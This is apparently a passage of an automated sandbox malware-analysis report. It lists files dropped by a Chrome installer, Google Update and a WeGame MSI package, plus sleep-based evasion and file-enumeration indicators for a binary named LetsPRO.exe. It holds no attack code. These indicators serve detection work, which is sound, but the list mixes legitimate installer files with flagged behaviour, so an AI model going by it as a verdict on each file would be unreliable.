                  Source: C:\Program Files (x86)\ChromeSetup.exe | Dropped PE file which has not been started: C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_ur.dll
                  Source: C:\Program Files (x86)\ChromeSetup.exe | Dropped PE file which has not been started: C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_zh-CN.dll
                  Source: C:\Program Files (x86)\ChromeSetup.exe | Dropped PE file which has not been started: C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_vi.dll
                  Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exe | Dropped PE file which has not been started: C:\Program Files (x86)\Google\Update\1.3.36.372\goopdateres_is.dll
                  Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exe | Dropped PE file which has not been started: C:\Program Files (x86)\Google\Update\1.3.36.372\goopdateres_pt-PT.dll
                  Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exe | Dropped PE file which has not been started: C:\Program Files (x86)\Google\Update\1.3.36.372\goopdateres_fr.dll
                  Source: C:\Program Files (x86)\ChromeSetup.exe | Dropped PE file which has not been started: C:\Windows\SystemTemp\GUMBC12.tmp\psmachine.dll
                  Source: C:\Program Files (x86)\ChromeSetup.exe | Dropped PE file which has not been started: C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_es.dll
                  Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exe | Dropped PE file which has not been started: C:\Program Files (x86)\Google\Update\1.3.36.372\goopdateres_iw.dll
                  Source: C:\Program Files (x86)\ChromeSetup.exe | Dropped PE file which has not been started: C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_da.dll
                  Source: C:\Program Files (x86)\ChromeSetup.exe | Dropped PE file which has not been started: C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_kn.dll
                  Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exe | Dropped PE file which has not been started: C:\Program Files (x86)\Google\Update\1.3.36.372\goopdateres_et.dll
                  Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exe | Dropped PE file which has not been started: C:\Program Files (x86)\Google\Update\1.3.36.372\goopdateres_no.dll
                  Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exe | Dropped PE file which has not been started: C:\Program Files (x86)\Google\Update\1.3.36.372\goopdateres_te.dll
                  Source: C:\Program Files (x86)\ChromeSetup.exe | Dropped PE file which has not been started: C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_sk.dll
                  Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exe | Dropped PE file which has not been started: C:\Program Files (x86)\Google\Update\1.3.36.372\psmachine_64.dll
                  Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exe | Dropped PE file which has not been started: C:\Program Files (x86)\Google\Update\1.3.36.372\goopdate.dll
                  Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exe | Dropped PE file which has not been started: C:\Program Files (x86)\Google\Update\1.3.36.372\goopdateres_en.dll
                  Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exe | Dropped PE file which has not been started: C:\Program Files (x86)\Google\Update\1.3.36.372\goopdateres_ko.dll
                  Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exe | Dropped PE file which has not been started: C:\Program Files (x86)\Google\Update\1.3.36.372\goopdateres_ja.dll
                  Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exe | Dropped PE file which has not been started: C:\Program Files (x86)\Google\Update\1.3.36.372\psuser_64.dll
                  Source: C:\Windows\System32\msiexec.exe | Dropped PE file which has not been started: C:\Program Files (x86)\WeGame\beacon_sdk.dll
                  Source: C:\Program Files (x86)\ChromeSetup.exe | Dropped PE file which has not been started: C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_es-419.dll
                  Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exe | Dropped PE file which has not been started: C:\Program Files (x86)\Google\Update\1.3.36.372\goopdateres_sl.dll
                  Source: C:\Program Files (x86)\ChromeSetup.exe | Dropped PE file which has not been started: C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_ms.dll
                  Source: C:\Program Files (x86)\ChromeSetup.exe | Dropped PE file which has not been started: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleCrashHandler64.exe
                  Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exe | Dropped PE file which has not been started: C:\Program Files (x86)\Google\Update\1.3.36.372\goopdateres_fil.dll
                  Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exe | Dropped PE file which has not been started: C:\Program Files (x86)\Google\Update\1.3.36.372\goopdateres_zh-CN.dll
                  Source: C:\Program Files (x86)\ChromeSetup.exe | Dropped PE file which has not been started: C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_mr.dll
                  Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exe | Dropped PE file which has not been started: C:\Program Files (x86)\Google\Update\1.3.36.372\goopdateres_fa.dll
                  Source: C:\Program Files (x86)\ChromeSetup.exe | Dropped PE file which has not been started: C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_sr.dll
                  Source: C:\Program Files (x86)\ChromeSetup.exe | Dropped PE file which has not been started: C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_lt.dll
                  Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exe | Dropped PE file which has not been started: C:\Program Files (x86)\Google\Update\1.3.36.372\goopdateres_ms.dll
                  Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exe | Dropped PE file which has not been started: C:\Program Files (x86)\Google\Update\1.3.36.372\goopdateres_bg.dll
                  Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exe | Dropped PE file which has not been started: C:\Program Files (x86)\Google\Update\1.3.36.372\GoogleUpdateComRegisterShell64.exe
                  Source: C:\Program Files (x86)\ChromeSetup.exe | Dropped PE file which has not been started: C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_fil.dll
                  Source: C:\Program Files (x86)\ChromeSetup.exe | Dropped PE file which has not been started: C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_fi.dll
                  Source: C:\Program Files (x86)\ChromeSetup.exe | Dropped PE file which has not been started: C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_id.dll
                  Source: C:\Program Files (x86)\ChromeSetup.exe | Dropped PE file which has not been started: C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_no.dll
                  Source: C:\Program Files (x86)\ChromeSetup.exe | Dropped PE file which has not been started: C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_pt-PT.dll
                  Source: C:\Program Files (x86)\ChromeSetup.exe | Dropped PE file which has not been started: C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_pl.dll
                  Source: C:\Windows\System32\msiexec.exe | Dropped PE file which has not been started: C:\Program Files (x86)\WeGame\common.dll
                  Source: C:\Windows\System32\msiexec.exe | Dropped PE file which has not been started: C:\Windows\Installer\MSIB59C.tmp
                  Source: C:\Program Files (x86)\ChromeSetup.exe | Dropped PE file which has not been started: C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_fr.dll
                  Source: C:\Windows\System32\msiexec.exe | Dropped PE file which has not been started: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\msvcp100.dll
                  Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exe | Dropped PE file which has not been started: C:\Program Files (x86)\Google\Update\1.3.36.372\goopdateres_cs.dll
                  Source: C:\Program Files (x86)\ChromeSetup.exe | Dropped PE file which has not been started: C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_gu.dll
                  Source: C:\Program Files (x86)\ChromeSetup.exe | Dropped PE file which has not been started: C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_uk.dll
                  Source: C:\Program Files (x86)\ChromeSetup.exe | Dropped PE file which has not been started: C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_th.dll
                  Source: C:\Program Files (x86)\ChromeSetup.exe | Dropped PE file which has not been started: C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_de.dll
                  Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exe | Dropped PE file which has not been started: C:\Program Files (x86)\Google\Update\1.3.36.372\goopdateres_tr.dll
                  Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exe | Dropped PE file which has not been started: C:\Program Files (x86)\Google\Update\1.3.36.372\goopdateres_hr.dll
                  Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exe | Dropped PE file which has not been started: C:\Program Files (x86)\Google\Update\1.3.36.372\goopdateres_ru.dll
                  Source: C:\Windows\System32\msiexec.exe | Dropped PE file which has not been started: C:\Windows\Installer\MSIB54D.tmp
                  Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exe | Dropped PE file which has not been started: C:\Program Files (x86)\Google\Update\1.3.36.372\goopdateres_hi.dll
                  Source: C:\Program Files (x86)\ChromeSetup.exe | Dropped PE file which has not been started: C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_sw.dll
                  Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exe | Dropped PE file which has not been started: C:\Program Files (x86)\Google\Update\1.3.36.372\GoogleCrashHandler.exe
                  Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exe | Dropped PE file which has not been started: C:\Program Files (x86)\Google\Update\1.3.36.372\goopdateres_ca.dll
                  Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exe | Dropped PE file which has not been started: C:\Program Files (x86)\Google\Update\1.3.36.372\goopdateres_nl.dll
                  Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exe | Dropped PE file which has not been started: C:\Program Files (x86)\Google\Update\1.3.36.372\goopdateres_ro.dll
                  Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exe | Dropped PE file which has not been started: C:\Program Files (x86)\Google\Update\1.3.36.372\goopdateres_it.dll
                  Source: C:\Program Files (x86)\ChromeSetup.exe | Dropped PE file which has not been started: C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_hu.dll
                  Source: C:\Program Files (x86)\ChromeSetup.exe | Dropped PE file which has not been started: C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_ta.dll
                  Source: C:\Program Files (x86)\ChromeSetup.exe | Dropped PE file which has not been started: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdateCore.exe
                  Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exe | Dropped PE file which has not been started: C:\Program Files (x86)\Google\Update\1.3.36.372\goopdateres_vi.dll
                  Source: C:\Program Files (x86)\ChromeSetup.exe | Dropped PE file which has not been started: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdateOnDemand.exe
                  Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exe | Dropped PE file which has not been started: C:\Program Files (x86)\Google\Update\1.3.36.372\goopdateres_sv.dll
                  Source: C:\Program Files (x86)\ChromeSetup.exe | Dropped PE file which has not been started: C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_sl.dll
                  Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exe | Dropped PE file which has not been started: C:\Program Files (x86)\Google\Update\1.3.36.372\goopdateres_en-GB.dll
                  Source: C:\Program Files (x86)\ChromeSetup.exe | Dropped PE file which has not been started: C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_ko.dll
                  Source: C:\Program Files (x86)\ChromeSetup.exe | Dropped PE file which has not been started: C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_pt-BR.dll
                  Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exe | Dropped PE file which has not been started: C:\Program Files (x86)\Google\Update\1.3.36.372\goopdateres_es.dll
                  Source: C:\Windows\System32\msiexec.exe | Dropped PE file which has not been started: C:\Windows\Installer\MSIB404.tmp
                  Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exe | Dropped PE file which has not been started: C:\Program Files (x86)\Google\Update\1.3.36.372\goopdateres_uk.dll
                  Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exe | Dropped PE file which has not been started: C:\Program Files (x86)\Google\Update\1.3.36.372\goopdateres_sk.dll
                  Source: C:\Program Files (x86)\ChromeSetup.exe | Dropped PE file which has not been started: C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_lv.dll
                  Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exe | Dropped PE file which has not been started: C:\Program Files (x86)\Google\Update\1.3.36.372\goopdateres_zh-TW.dll
                  Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exe | Dropped PE file which has not been started: C:\Program Files (x86)\Google\Update\1.3.36.372\goopdateres_da.dll
                  Source: C:\Program Files (x86)\ChromeSetup.exe | Dropped PE file which has not been started: C:\Windows\SystemTemp\GUMBC12.tmp\psuser.dll
                  Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exe | Dropped PE file which has not been started: C:\Program Files (x86)\Google\Update\1.3.36.372\goopdateres_bn.dll
                  Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exe | Dropped PE file which has not been started: C:\Program Files (x86)\Google\Update\1.3.36.372\goopdateres_ml.dll
                  Source: C:\Program Files (x86)\ChromeSetup.exe | Dropped PE file which has not been started: C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_te.dll
                  Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exe | Dropped PE file which has not been started: C:\Program Files (x86)\Google\Update\1.3.36.372\goopdateres_pl.dll
                  Source: C:\Program Files (x86)\ChromeSetup.exe | Dropped PE file which has not been started: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleCrashHandler.exe
                  Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exe | Dropped PE file which has not been started: C:\Program Files (x86)\Google\Update\1.3.36.372\goopdateres_ar.dll
                  Source: C:\Program Files (x86)\ChromeSetup.exe | Dropped PE file which has not been started: C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_iw.dll
                  Source: C:\Windows\System32\msiexec.exe | Dropped PE file which has not been started: C:\Windows\Installer\MSIB5FB.tmp
                  Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exe | Dropped PE file which has not been started: C:\Program Files (x86)\Google\Update\1.3.36.372\goopdateres_ur.dll
                  Source: C:\Program Files (x86)\ChromeSetup.exe | Dropped PE file which has not been started: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdateBroker.exe
                  Source: C:\Program Files (x86)\ChromeSetup.exe | Dropped PE file which has not been started: C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_zh-TW.dll
                  Source: C:\Program Files (x86)\ChromeSetup.exe | Dropped PE file which has not been started: C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_et.dll
                  Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exeDropped PE file which has not been started: C:\Program Files (x86)\Google\Update\1.3.36.372\goopdateres_kn.dllJump to dropped file
                  Source: C:\Program Files (x86)\ChromeSetup.exeDropped PE file which has not been started: C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_ja.dllJump to dropped file
                  Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exeDropped PE file which has not been started: C:\Program Files (x86)\Google\Update\1.3.36.372\goopdateres_lt.dllJump to dropped file
                  Source: C:\Program Files (x86)\ChromeSetup.exeDropped PE file which has not been started: C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_el.dllJump to dropped file
                  Source: C:\Program Files (x86)\ChromeSetup.exeDropped PE file which has not been started: C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_bg.dllJump to dropped file
                  Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exeDropped PE file which has not been started: C:\Program Files (x86)\Google\Update\1.3.36.372\GoogleUpdateBroker.exeJump to dropped file
                  Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exeDropped PE file which has not been started: C:\Program Files (x86)\Google\Update\1.3.36.372\goopdateres_mr.dllJump to dropped file
                  Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exeDropped PE file which has not been started: C:\Program Files (x86)\Google\Update\1.3.36.372\goopdateres_es-419.dllJump to dropped file
                  Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files (x86)\WeGame\adapt_for_imports.dllJump to dropped file
                  Source: C:\Program Files (x86)\ChromeSetup.exeDropped PE file which has not been started: C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_fa.dllJump to dropped file
                  Source: C:\Program Files (x86)\ChromeSetup.exeDropped PE file which has not been started: C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_ar.dllJump to dropped file
                  Source: C:\Program Files (x86)\ChromeSetup.exeDropped PE file which has not been started: C:\Windows\SystemTemp\GUMBC12.tmp\goopdate.dllJump to dropped file
                  Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exeDropped PE file which has not been started: C:\Program Files (x86)\Google\Update\1.3.36.372\goopdateres_el.dllJump to dropped file
                  Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exeDropped PE file which has not been started: C:\Program Files (x86)\Google\Update\1.3.36.372\goopdateres_de.dllJump to dropped file
                  Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files (x86)\WeGame\Lua51.dllJump to dropped file
                  Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exeDropped PE file which has not been started: C:\Program Files (x86)\Google\Update\1.3.36.372\goopdateres_pt-BR.dllJump to dropped file
                  Source: C:\Program Files (x86)\ChromeSetup.exeDropped PE file which has not been started: C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_en-GB.dllJump to dropped file
                  Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exeDropped PE file which has not been started: C:\Program Files (x86)\Google\Update\1.3.36.372\goopdateres_th.dllJump to dropped file
                  Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exeDropped PE file which has not been started: C:\Program Files (x86)\Google\Update\1.3.36.372\GoogleUpdateCore.exeJump to dropped file
                  Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exeDropped PE file which has not been started: C:\Program Files (x86)\Google\Update\1.3.36.372\goopdateres_fi.dllJump to dropped file
                  Source: C:\Program Files (x86)\ChromeSetup.exeDropped PE file which has not been started: C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_hr.dllJump to dropped file
                  Source: C:\Program Files (x86)\ChromeSetup.exeDropped PE file which has not been started: C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_en.dllJump to dropped file
                  Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exeDropped PE file which has not been started: C:\Program Files (x86)\Google\Update\1.3.36.372\goopdateres_gu.dllJump to dropped file
                  Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exeDropped PE file which has not been started: C:\Program Files (x86)\Google\Update\1.3.36.372\goopdateres_sr.dllJump to dropped file
                  Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exeDropped PE file which has not been started: C:\Program Files (x86)\Google\Update\1.3.36.372\psuser.dllJump to dropped file
                  Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files (x86)\WeGame\WeGame.exeJump to dropped file
                  Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exeDropped PE file which has not been started: C:\Program Files (x86)\Google\Update\1.3.36.372\psmachine.dllJump to dropped file
                  Source: C:\Program Files (x86)\ChromeSetup.exeDropped PE file which has not been started: C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_bn.dllJump to dropped file
                  Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exeDropped PE file which has not been started: C:\Program Files (x86)\Google\Update\1.3.36.372\goopdateres_lv.dllJump to dropped file
                  Source: C:\Program Files (x86)\ChromeSetup.exeDropped PE file which has not been started: C:\Windows\SystemTemp\GUMBC12.tmp\psuser_64.dllJump to dropped file
                  Source: C:\Program Files (x86)\ChromeSetup.exeDropped PE file which has not been started: C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_hi.dllJump to dropped file
                  Source: C:\Program Files (x86)\ChromeSetup.exeDropped PE file which has not been started: C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_ru.dllJump to dropped file
                  Source: C:\Program Files (x86)\ChromeSetup.exeDropped PE file which has not been started: C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_cs.dllJump to dropped file
                  Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exeDropped PE file which has not been started: C:\Program Files (x86)\Google\Update\1.3.36.372\goopdateres_id.dllJump to dropped file
                  Source: C:\Program Files (x86)\ChromeSetup.exeDropped PE file which has not been started: C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_am.dllJump to dropped file
                  Source: C:\Program Files (x86)\ChromeSetup.exeDropped PE file which has not been started: C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_tr.dllJump to dropped file
                  Source: C:\Program Files (x86)\ChromeSetup.exeDropped PE file which has not been started: C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_is.dllJump to dropped file
                  Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exeDropped PE file which has not been started: C:\Program Files (x86)\Google\Update\1.3.36.372\GoogleUpdateOnDemand.exeJump to dropped file
                  Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exeEvasive API call chain: GetSystemTimeAsFileTime,DecisionNodes
                  Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exeAPI coverage: 0.1 %
                  Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exeAPI coverage: 8.0 %
                  Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe TID: 1848Thread sleep count: 656 > 30Jump to behavior
                  Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe TID: 2436Thread sleep count: 271 > 30Jump to behavior
                  Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe TID: 3840Thread sleep count: 460 > 30Jump to behavior
                  Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe TID: 3840Thread sleep time: -460000s >= -30000sJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe TID: 5532Thread sleep count: 2633 > 30Jump to behavior
                  Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe TID: 1272Thread sleep count: 3264 > 30Jump to behavior
                  Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe TID: 1272Thread sleep time: -32640s >= -30000sJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe TID: 3840Thread sleep count: 1615 > 30Jump to behavior
                  Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe TID: 3840Thread sleep time: -1615000s >= -30000sJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7968Thread sleep count: 258 > 30
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7968Thread sleep count: 342 > 30
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7940Thread sleep time: -922337203685477s >= -30000s
                  Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                  Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exeThread sleep count: Count: 2633 delay: -10Jump to behavior
                  Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exeThread sleep count: Count: 3264 delay: -10Jump to behavior
                  Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exeCode function: 5_2_6C950BF3 _wstat64,__doserrno,_errno,_invalid_parameter_noinfo,_wcspbrk,_errno,__doserrno,towlower,_getdrive,FindFirstFileExW,_wcspbrk,_wcslen,GetDriveTypeW,free,___loctotime64_t,free,_wsopen_s,__fstat64,_close,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime64_t,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime64_t,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime64_t,FindClose,___wdtoxmode,GetLastError,__dosmaperr,FindClose,5_2_6C950BF3
                  Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exeCode function: 5_2_6C94CB0B _malloc_crt,FindClose,FindFirstFileExW,FindNextFileW,FindClose,5_2_6C94CB0B
                  Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exeCode function: 5_2_6C9507B2 _wstat32,__doserrno,_errno,_invalid_parameter_noinfo,_wcspbrk,_errno,__doserrno,towlower,_getdrive,FindFirstFileExW,_wcspbrk,_wcslen,GetDriveTypeW,free,___loctotime32_t,free,_wsopen_s,__fstat32,_close,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime32_t,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime32_t,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime32_t,FindClose,___wdtoxmode,GetLastError,__dosmaperr,FindClose,5_2_6C9507B2
                  Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exeCode function: 5_2_6C94C7E5 _malloc_crt,FindClose,FindFirstFileExA,FindNextFileA,FindClose,5_2_6C94C7E5
                  Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exeCode function: 5_2_6C917CAD _wstat64i32,_wcspbrk,_getdrive,FindFirstFileExW,_wcspbrk,_wcslen,_errno,__doserrno,__doserrno,_errno,_invalid_parameter_noinfo,towlower,GetDriveTypeW,free,___loctotime64_t,free,_wsopen_s,__fstat64i32,_close,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime64_t,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime64_t,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime64_t,FindClose,___wdtoxmode,GetLastError,__dosmaperr,FindClose,5_2_6C917CAD
                  Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exeCode function: 5_2_6C94FE26 _stat32i64,__doserrno,_errno,_invalid_parameter_noinfo,_mbspbrk,_errno,__doserrno,_mbctolower,_getdrive,FindFirstFileExA,_mbspbrk,__wfullpath_helper,_strlen,_IsRootUNCName,GetDriveTypeA,free,___loctotime32_t,free,__wsopen_s,__fstat32i64,_close,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime32_t,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime32_t,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime32_t,FindClose,___dtoxmode,GetLastError,__dosmaperr,FindClose,5_2_6C94FE26
                  Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exeCode function: 5_2_6C94DFA9 _wfindfirst32,_errno,_invalid_parameter_noinfo,FindFirstFileExW,GetLastError,_errno,_errno,_errno,___time64_t_from_ft,___time64_t_from_ft,___time64_t_from_ft,wcscpy_s,__invoke_watson,_wfindnext32,_errno,_invalid_parameter_noinfo,_errno,_invalid_parameter_noinfo,FindNextFileW,GetLastError,_errno,_errno,_errno,___time64_t_from_ft,___time64_t_from_ft,___time64_t_from_ft,wcscpy_s,__invoke_watson,_wfindfirst64,_errno,_invalid_parameter_noinfo,FindFirstFileExW,GetLastError,_errno,_errno,_errno,___time64_t_from_ft,___time64_t_from_ft,___time64_t_from_ft,wcscpy_s,__invoke_watson,_wfindnext64,_errno,_invalid_parameter_noinfo,_errno,_invalid_parameter_noinfo,FindNextFileW,GetLastError,_errno,_errno,_errno,___time64_t_from_ft,___time64_t_from_ft,___time64_t_from_ft,wcscpy_s,__invoke_watson,_wfindfirst64i32,_errno,_invalid_parameter_noinfo,FindFirstFileExW,GetLastError,_errno,_errno,_errno,___time64_t_from_ft,___time64_t_from_ft,___time64_t_from_ft,wcscpy_s,__invoke_watson,_wfindnext64i32,_errno,_invalid_parameter_noinfo,_errno,_invalid_parameter_noinfo,FindNextFileW,GetLastError,_errno,_errno,_errno,___time64_t_from_ft,___time64_t_from_ft,___time64_t_from_ft,wcscpy_s,__invoke_watson,_wfindfirst32i64,_errno,_invalid_parameter_noinfo,FindFirstFileExW,GetLastError,_errno,_errno,_errno,___time64_t_from_ft,___time64_t_from_ft,___time64_t_from_ft,wcscpy_s,__invoke_watson,_wfindnext32i64,_errno,_invalid_parameter_noinfo,_errno,_invalid_parameter_noinfo,FindNextFileW,GetLastError,_errno,_errno,_errno,___time64_t_from_ft,___time64_t_from_f